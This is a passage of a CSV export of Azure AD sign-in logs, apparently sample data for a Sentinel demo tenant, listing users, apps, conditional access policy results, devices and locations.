Directory,c457a232-7a13-4abd-a93c-6f0a00a51300,SigninLogs,Sucess,33.7984581,-84.38828278
+1614,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:35.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a5674c72-6dc4-42c1-a7db-9747be54e0c1,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:28,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c457a232-7a13-4abd-a93c-6f0a7aa51300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,c457a232-7a13-4abd-a93c-6f0a7aa51300,SigninLogs,Sucess,33.7984581,-84.38828278
+1615,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,06:45.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cbe2ca82-512e-4c05-941a-b0e92a49a57b,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:06,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 83.0.478', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",cf3e7e97-0a99-402a-b1d4-bc8905476a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cf3e7e97-0a99-402a-b1d4-bc8905476a00,SigninLogs,Sucess,35.01296997,-80.93171692
+1616,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,bc9bf6d9-49c4-460c-b943-497c13889088,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ac9a90bc-e2ad-45f7-b2a8-b415c6fe1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ac9a90bc-e2ad-45f7-b2a8-b415c6fe1200,SigninLogs,Failed,33.7984581,-84.38828278
+1617,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:48.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,03369eb3-ca78-4555-a449-fd2916bbea89,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",aa57d52a-288e-488c-a4a9-011b65dd1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,aa57d52a-288e-488c-a4a9-011b65dd1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1618,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:04.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ba70abd-1fdd-41ac-9bd0-1ac6a89652df,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 2,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Firefox 74.0'}",0db84f87-d59a-4024-94d6-18fb6cf31300,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.19916999340057373, 'latitude': 51.49555969238281}, 'state': 'Greater London', 'city': 'Kensington And Chelsea'}",none,none,none,none,[],{'errorCode': 0},Sentinel Partner Account 2,2f3450f9-6201-430f-9235-25062d3f412b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0db84f87-d59a-4024-94d6-18fb6cf31300,SigninLogs,Sucess,51.49555969,-0.199169993
+1619,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:45.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1dac5086-7e1c-461a-abd7-4c7374f02375,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",68d708e5-0f59-4f58-b7ee-efd210ae1200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,68d708e5-0f59-4f58-b7ee-efd210ae1200,SigninLogs,Sucess,33.7984581,-84.38828278
+1620,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:48.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3d28d8fd-0338-40c2-a635-5e86bc3e71d7,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",f22e123a-cab3-4cb1-81e0-9a3bc8a91400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,f22e123a-cab3-4cb1-81e0-9a3bc8a91400,SigninLogs,Sucess,33.7984581,-84.38828278
+1621,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,19:05.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3ca07030-42de-42fb-af92-5c5f4435bbad,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:19,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ac9a90bc-e2ad-45f7-b2a8-b415040f1300,,,"{'countryOrRegion': 'US', 